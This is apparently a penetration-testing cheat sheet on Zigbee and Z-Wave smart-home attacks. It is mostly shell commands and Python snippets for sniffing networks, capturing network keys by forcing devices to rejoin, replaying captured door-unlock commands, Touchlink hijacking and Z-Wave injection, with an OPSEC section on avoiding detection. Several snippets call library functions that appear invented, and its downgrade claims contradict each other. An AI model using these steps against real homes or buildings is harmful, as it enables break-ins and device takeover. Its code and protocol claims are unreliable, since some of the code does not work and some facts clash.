Zigbee and Z-Wave Attacks
#Overview
Zigbee (IEEE 802.15.4) and Z-Wave are short-range, low-power wireless protocols used in smart home automation, building management, and industrial IoT. Both protocols prioritize low power consumption over security, creating attack surfaces for replay attacks, key extraction, and device hijacking.
#Zigbee Architecture
| Layer | Protocol | Function |
|---|---|---|
| Physical | IEEE 802.15.4 | 2.4 GHz ISM band, 16 channels |
| MAC | IEEE 802.15.4 | Channel access, frame formatting |
| Network | Zigbee NWK | Mesh routing, joining, security |
| Application | Zigbee APS/ZCL | Application profiles, clusters |
#Zigbee Security
- Network key (NWK key): 128-bit AES key shared by all devices in the network
- Link key: 128-bit AES key for device joining (application layer)
- Default Trust Center link key:
5A6967426565416C6C69616E63653039(ZigBeeAlliance09) - Transport key: Network key is sent in cleartext during device joining (if using the default link key)
#Attack Decision Tree
Zigbee/Z-Wave Target Identified?
|
|-- Zigbee
| |-- Device joining in progress? --> Capture NWK key (transport key attack)
| |-- Known network key? --> Decrypt all traffic
| |-- Unknown network key? --> Replay attack or key extraction
| |-- Touchlink commissioning? --> Touchlink attack
|
|-- Z-Wave
|-- Known Home ID? --> Z-Wave network enumeration
|-- Z-Wave Plus device? --> SmartStart attack
|-- Legacy Z-Wave? --> Downgrade attack
TEXT
#Zigbee Attacks
#Zigbee Network Discovery
# Using KillerBee framework
git clone https://github.com/riverloopsec/killerbee.git
cd killerbee && pip install .
# Discover Zigbee networks
sudo zbstumbler -C 11
# Capture Zigbee traffic
sudo zbdump -c 11 -w zigbee_capture.pcap
# Or with KillerBee Python API
python3 << 'EOF'
from killerbee import *
kb = KillerBee()
kb.sniffer_channel(11)
for i in range(100):
pkt = kb.sniffer_next_packet()
if pkt:
print(f"Packet: {pkt}")
EOF
BASH
#Transport Key Attack (Network Key Capture)
The most impactful Zigbee attack. When a device joins a Zigbee network using the default Trust Center link key, the network key is sent in cleartext over the air.
# Step 1: Monitor for device joining
sudo zbdump -c 11 -w joining.pcap
# Step 2: Force a device to rejoin (deauthenticate)
# This triggers the transport key exchange
sudo zbreplay -i -c 11 -f deauth.pcap
# Step 3: Extract the network key from the capture
python3 << 'EOF'
from killerbee import *
kb = KillerBee()
kb.set_channel(11)
kb.sniffer_enable()
# Look for APS command with transport key
# The network key is in the "Transport Key" frame (APS command 0x03)
# Decrypt using the default link key: ZigBeeAlliance09
EOF
BASH
#Zigbee Replay Attack
Capture a Zigbee command (e.g., "unlock door") and replay it later.
# Capture Zigbee traffic
sudo zbdump -c 11 -w zigbee_capture.pcap
# Find the packet to replay (e.g., a door unlock command)
# Analyze in Wireshark: filter "zbee_nwk"
# Replay the captured packet
sudo zbreplay -c 11 -f zigbee_capture.pcap
# Or replay a specific packet with modified parameters
sudo zbreplay -c 11 -f specific_command.pcap -d <delay_ms>
BASH
#Zigbee Key Extraction
# Using KillerBee to extract keys from captures
python3 << 'EOF'
from killerbee import *
from killerbee.zbgpcracker import *
# Crack the network key from a transport key capture
cracker = ZBGPKeyCracker()
cracker.crack_key('joining.pcap', 'ZigBeeAlliance09')
# If the link key is known, decrypt all traffic
kb = KillerBee()
kb.set_channel(11)
kb.set_key(NWK_KEY)
kb.sniffer_enable()
EOF
BASH
#Touchlink Attack
Touchlink (ZLL) commissioning allows devices to join by proximity. If Touchlink commissioning is enabled, an attacker within range can join the network.
# Scan for Touchlink-enabled devices
python3 << 'EOF'
from killerbee import *
kb = KillerBee()
# Send Touchlink scan request on all channels
for channel in range(11, 27):
kb.set_channel(channel)
kb.send_touchlink_scan()
# Check for responses
EOF
# If a Touchlink device responds, it can be:
# 1. Reset to factory defaults
# 2. Forced to join an attacker's network
# 3. Made to leave its current network
BASH
#Z-Wave Attacks
#Z-Wave Network Discovery
# Using Z-Wave sniffing tools
# Requires: Z-Wave stick (Z-Stick, Aeotec, etc.)
# Enumerate Z-Wave network
python3 << 'EOF'
from openzwave import ZWaveManager
manager = ZWaveManager('/dev/ttyACM0')
network = manager.get_network()
for node in network.get_nodes():
print(f"Node {node.id}: {node.product_name} ({node.product_type})")
EOF
BASH
#Z-Wave Downgrade Attack
Z-Wave Plus (500 series) devices use AES-128 encryption. However, some devices fall back to the older Z-Wave protocol (legacy) which uses a weaker XOR-based encryption. An attacker can force this downgrade.
# Z-Wave downgrade attack
# 1. Capture Z-Wave traffic from a Z-Wave Plus device
# 2. Modify the protocol version in the packet
# 3. Re-transmit with the downgraded version
# 4. The target device processes the command using legacy encryption
# Using Z-Wave radio tools:
# Requires hardware: Z-Stick + custom firmware
# The attack exploits:
# - Z-Wave protocol version negotiation
# - Legacy devices accept commands in the old format
# - AES-128 is bypassed by downgrading to XOR encryption
BASH
#Z-Wave Packet Injection
# Using RFcat (requires YardStick One or similar CC1111-based radio)
python3 << 'EOF'
from rflib import *
# Initialize RFcat
d = RfCat()
# Set Z-Wave frequency (varies by region)
d.setFreq(868420000) # EU
# d.setFreq(908420000) # US
# Set modulation
d.setModem(MOD_ASK)
# Transmit Z-Wave packet
# Z-Wave frames: Preamble + SOF + Length + Payload + CRC
d.RFxmit(b'\x00\x00\x00\x00\x00\x00\x00\x00') # Placeholder frame
EOF
BASH
#IoT Device Identification via Wireless Fingerprinting
# Identify device types by their wireless signatures
# Zigbee device fingerprinting
python3 << 'EOF'
from killerbee import *
# Each Zigbee device has:
# - IEEE address (64-bit, assigned by manufacturer)
# - Network address (16-bit, assigned by coordinator)
# - Device type (coordinator, router, end device)
# - Power source (mains, battery)
# - Receive mode (always on, periodically on)
kb = KillerBee()
# List device profiles by IEEE OUI
# Zigbee OUI prefixes:
# 00:12:4B - Digi International
# 00:0D:6F - Ember
# 00:50:C2 - Philips Hue
# 00:15:8A - Telldus
EOF
BASH
#Practical Methodology
- Reconnaissance: Use
zbstumblerand Z-Wave tools to discover networks - Traffic capture: Capture Zigbee traffic on channels 11-26 and Z-Wave traffic at 868/908 MHz
- Key extraction: Capture device joining to extract the network key
- Decryption: Decrypt all traffic using the extracted key
- Replay: Identify and replay interesting commands (unlock, open, activate)
- Injection: Craft and inject custom commands
- Report: Document all vulnerabilities with packet captures
#Common Pitfalls
- Zigbee channels overlap with WiFi: Channels 15, 20, 25 are the least interfered. Check for WiFi interference.
- Z-Wave regional frequencies: Z-Wave uses different frequencies in different regions (868 MHz EU, 908 MHz US, 919 MHz ANZ).
- Zigbee network key rotation: Some networks rotate the network key, requiring re-capture.
- Z-Wave AES-128: Newer Z-Wave Plus devices use AES-128, which is not vulnerable to downgrade.
- Touchlink range: Touchlink commissioning only works within ~40cm proximity.
#OPSEC Considerations
- Zigbee transmissions on 2.4 GHz are detectable by any Zigbee sniffer in range
- Z-Wave transmissions are detectable by any Z-Wave sniffer in range
- Replay attacks duplicate legitimate commands — defenders can correlate timestamps
- Transport key capture is passive until the device is forced to rejoin
- Always verify scope includes IoT device testing
#Cross-References
- Bluetooth Attacks — Another short-range wireless protocol
- SDR Wireless Attacks — Sub-GHz frequency analysis
- NAC Bypass — Bypassing NAC after IoT device compromise
#Tool References
| Tool | Purpose | Link |
|---|---|---|
| KillerBee | Zigbee attack framework | https://github.com/riverloopsec/killerbee |
| zbstumbler | Zigbee network discovery | KillerBee suite |
| zbdump | Zigbee packet capture | KillerBee suite |
| zbreplay | Zigbee packet replay | KillerBee suite |
| RFcat | Sub-GHz radio tool | https://github.com/atlas0fd00m/rfcat |
| OpenZWave | Z-Wave controller library | https://github.com/OpenZWave/open-zwave |
| Z-Wave.me | Z-Wave tools and SDK | https://z-wave.me/ |